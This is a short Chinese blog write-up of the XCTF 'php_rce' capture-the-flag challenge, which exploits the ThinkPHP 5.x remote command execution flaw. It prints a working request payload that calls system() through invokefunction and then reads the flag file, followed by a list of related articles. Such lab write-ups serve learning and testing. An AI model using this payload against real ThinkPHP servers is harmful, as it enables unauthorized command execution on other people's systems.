攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞
2020-07-15 00:06
267 查看
攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞
题目
首先我们是命令执行rce,那么我们一般优先访问index.php
然后进行代码审计(这里为了方便,搬运简书大佬的复现和审计)
简书大佬的复现
解法
因为要将我们输入的东西实例化(thinkphp他是这么叫的)
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20"flag*"
function也是他文件中自带的,vars也是它自带的,
那么我们首先执行system命令
find / -name “flag*”
找寻根目录下 名字是flag的所有文件,不看后缀
然后我们直接cat /flag即可
得到flag
相关文章推荐
- 攻防世界 web command_execution 命令执行漏洞的原理
- thinkphp5.x命令执行漏洞复现及环境搭建
- 攻防世界web---php_rce
- 攻防世界web进阶PHP2详解
- php_rce 攻防世界xctf web
- 攻防世界web进阶区Web_php_unserialize,序列化大详解
- 攻防世界web进阶区Web_php_include两种解法
- Thinkphp框架 5.x远程命令执行漏洞复现
- ThinkPHP 5.x 远程命令执行漏洞修复
- ThinkPHP 5.x远程命令执行漏洞复现
- ThinkPHP 5.x远程命令执行漏洞复现
- 攻防世界web进阶区PHP2
- 攻防世界web进阶news center
- 利用phar实行php反序列化命令执行漏洞复现
- Web_php_include攻防世界xctf web
- ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
- [wp] 攻防世界 Web_php_wrong_nginx_config
- 攻防世界web进阶区ics-06
- 攻防世界web进阶区NewsCenter详解
- JBOSS AS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)